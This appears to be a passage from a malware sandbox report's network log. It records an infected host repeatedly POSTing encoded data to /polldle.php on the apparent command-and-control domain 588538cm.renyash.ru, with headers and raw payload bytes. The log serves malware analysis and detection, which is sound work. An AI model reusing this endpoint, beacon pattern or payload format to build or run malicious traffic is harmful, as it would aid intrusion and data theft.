Jan 11, 2025 23:34:14.671648979 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:15.039063931 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEqlBDcMoR2vEBIZNtm6%2F9eCFWC0FkalfV2KdZR0tQqQ6laIuJwBkBtEVVhoHNiePn5ystUO5FsCGmnkC9TZ74YCDx3nGT6%2BIGP2lqmXosoWFwvqmUfI96gIr%2F%2B5QfvcqF6V1QoC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f7c7b8c8c41-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7829&min_rtt=1950&rtt_var=12490&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=29805&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
104 | 192.168.2.4 | 50112 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:15.163779020 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
Jan 11, 2025 23:34:15.611347914 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:15.876904011 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QJolB%2F5q7j0j%2FQc2HKpTC4Rg4bcH7w85l83l3vL75S%2F%2BLLlpTSLoklvIpRh6f8yrsF0xbd6rc2bGaL1qrlXJd9c873PQ%2BdCcc%2BoqqtF5WFG4XeOauPPA5hyRQ5QVOVUo9x2xXzl"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f874f71f793-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1478&rtt_var=975&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=461441&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
105 | 192.168.2.4 | 50113 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:16.009757996 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:16.477673054 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:16.639544010 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPrwEi04Sa%2FjKkjkg3LFCaIBPWZTIV4Qy%2BZcHtNU1msBo%2BBNmNKklIk%2FWW4wmMbc6SW%2BPFQbyKEGD6xBMKqvWS64VFhU1Ew0zH1Paygvv1vvLszW3PsKjrT1GqWfulYPQSBEfMab"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f8cb82bc425-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5071&min_rtt=1523&rtt_var=7667&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=48814&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
106 | 192.168.2.4 | 50114 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:16.770922899 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:17.224318027 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:17.462191105 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugLH9jEFiyAzsGHObS8DYz788VdcXJbsblSob6zLtgh%2FhYh2aL9NWXkHRGoiBX0CLqIxN2mh1ortfu5wF%2FtHg2kmv2Xs47QZAuC2ifqa2gTwoIrgFIeWLtlFmAKaCKEut4vg0yHK"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f916d88c335-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3235&min_rtt=1579&rtt_var=3905&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=98449&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.4 | 50115 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:17.583266973 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:18.037406921 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.4 | 50116 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:18.089493990 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:18.545063972 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:18.777568102 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKand1D6rxIywWhu%2BlQejIh1LRDnxZD8pB8%2BEz0SFs0ChZdH8KSRr8PReKhhg96d0EjNrDkeoUqkANh1h8z5sJwTcFrkVi0S4hdkWXTvB1yaXQef%2F7nSD%2FtiYd54wX6vjeqnQKN3"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f999e4d1a1f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3361&min_rtt=2032&rtt_var=3420&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=115278&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.4 | 50117 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:18.209371090 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:18.674092054 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:18.915122032 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVHmhih8CTHdqwFCGlVU0MPbus%2Fk5mlcg5zzy0DDQc9QmKceEgMqptXTgXja4EnMulrX4qXVr3mItO2QNFu33aPB4BbWOoCZwrZyf7tmvxpRXE6vZAfuPqIprr7Oa3%2FMmmdWSltX"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f9a6d300ca4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3987&min_rtt=1635&rtt_var=5318&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=71369&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
110 | 192.168.2.4 | 50118 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:19.047813892 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
Jan 11, 2025 23:34:19.512047052 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:19.680515051 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GR9uYXYgGNVf2YoXjeW8GAzeBOnqqGCgxwfJSowXiDqCiAWz0%2Ba9myu%2FolvBXvD%2BLGOxGUldlLC055uaArVOwRO8ibKvEc0OWqYnvbVkLscMYUkrdDx1gfuiVyL0RtXAxYQeQMTS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f9fac876a5b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4770&min_rtt=1726&rtt_var=6735&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=55985&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
111 | 192.168.2.4 | 50119 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:19.827714920 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:20.176774025 CET | 2504 | OUT | Data Raw: 5d 5b 54 55 5f 41 5a 50 54 5d 55 5a 50 59 59 5e 50 57 5a 5d 57 5d 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TU_AZPT]UZPYY^PWZ]W]P^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -%$(8]&!&0"#,:,(#(U1U94(Z"18(#X'/\/0
Jan 11, 2025 23:34:20.281785011 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:20.523263931 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngITlRiTs2SIKAN7bL0xo9lRWSdHC9ZVAvLnYOMDw0Hg0mlWiGrQTQEUzftOvsIfBzjF0oe%2FzcGIJTuwc7wSvlp%2FedCtbfFp8SgtDovefMygjgB1fjVNB4yLzXDo3eKZDswDztlG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fa47b478c75-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4418&min_rtt=2098&rtt_var=5427&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=70671&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
112 | 192.168.2.4 | 50120 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:20.652486086 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:21.004897118 CET | 2500 | OUT | Data Raw: 58 5f 51 53 5f 43 5a 5e 54 5d 55 5a 50 5c 59 5f 50 5c 5a 5b 57 5c 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_QS_CZ^T]UZP\Y_P\Z[W\P_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3218$%%\%,1S7?:;8++0&-#"'?5#X'/\/
Jan 11, 2025 23:34:21.097393036 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:21.372791052 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8OejndMpbNJ4FkbkK0ij6b9YU6Cz9N8qyRnpuy20QzyxGPuh1DlMfBJWBl4Euu7SC%2BJoFhggZMjZHHM5L865FF2Pxk4S2k9Ux5Rmy7UtIXTY2zCwnqZyMVoj112k4qY3xuV8zwnd"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fa99c888c8d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3630&min_rtt=1982&rtt_var=4039&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=96267&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
113 | 192.168.2.4 | 50121 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:21.515712976 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:21.864425898 CET | 2504 | OUT | Data Raw: 5d 59 54 55 5a 41 5a 50 54 5d 55 5a 50 54 59 5d 50 57 5a 59 57 57 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTUZAZPT]UZPTY]PWZYWWP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A:%$+$[&T9X0?5T#:,+$+,0102S. "20(#X'/\/
Jan 11, 2025 23:34:21.959522009 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:22.203393936 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZHZfbJYFNMVugRt1Q%2FKz8nycdGlv8VWkRchUBH0tBHS6rWzi6NbaWkkcMftetNMCrVsF0yFDvlU1fWoQBTuyoDCnCNQcQBdA%2FXnMdKKRduTW1xvuWbeOp7k0uVGuiEruAdwJl5L"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085faef8891a07-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3263&min_rtt=1966&rtt_var=3332&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=118237&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
114 | 192.168.2.4 | 50122 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:22.378753901 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:22.723790884 CET | 2504 | OUT | Data Raw: 58 51 54 57 5a 44 5a 5b 54 5d 55 5a 50 5f 59 5e 50 5c 5a 5b 57 54 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTWZDZ[T]UZP_Y^P\Z[WTP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -3%?%263-4%[,++/13).;""/X?%#X'/\/(
Jan 11, 2025 23:34:22.754982948 CET | 1236 | OUT | Data Raw: 3a 55 04 0b 34 3f 1b 05 30 31 3f 3b 3c 06 25 07 3b 41 33 5b 31 2b 02 3d 07 2b 23 12 30 0f 3f 20 05 08 5a 1e 39 3b 3f 2a 3b 20 2b 13 22 36 26 3b 04 5c 30 37 3b 06 3d 07 0b 2c 1a 38 3f 0a 31 3d 26 11 05 11 3f 04 37 3b 04 20 2a 10 3c 08 05 18 30 35
                                                                                Data Ascii: :U4?01?;<%;A3[1+=+#0? Z9;?*; +"6&;\07;=,8?1=&?7; *<05/)8Y=T,14^50$*%,"87*/7<</&![+9=(10(-=<:[(^(X0 $853-0=4"6#!0<98-_&-'Y248>9**=.47[U806':0:(
Jan 11, 2025 23:34:22.833591938 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:23.054723978 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDOUvRrb6Z2WWKhWFaHt1q193mP2i5E2ZvXJ%2FDtL%2FyiF7MpdtUmzoCyY6K9BbDwsMGoUnemGjGuyjjkXtwF1NZUomSohy0AI3zHB4bwlVvbZfhR6979AAGMDCukqXYB0Y8vIwi1k"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fb47b614352-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3996&min_rtt=2538&rtt_var=3869&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=102751&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
115 | 192.168.2.4 | 50123 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:23.182759047 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:23.536339045 CET | 2504 | OUT | Data Raw: 5d 5c 51 53 5f 43 5f 58 54 5d 55 5a 50 5f 59 5d 50 5d 5a 59 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QS_C_XT]UZP_Y]P]ZYWWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3928X%%Y$:7<1,+;)/2:''!2;[+#X'/\/(
Jan 11, 2025 23:34:23.636280060 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.4 | 50124 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:23.792531967 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
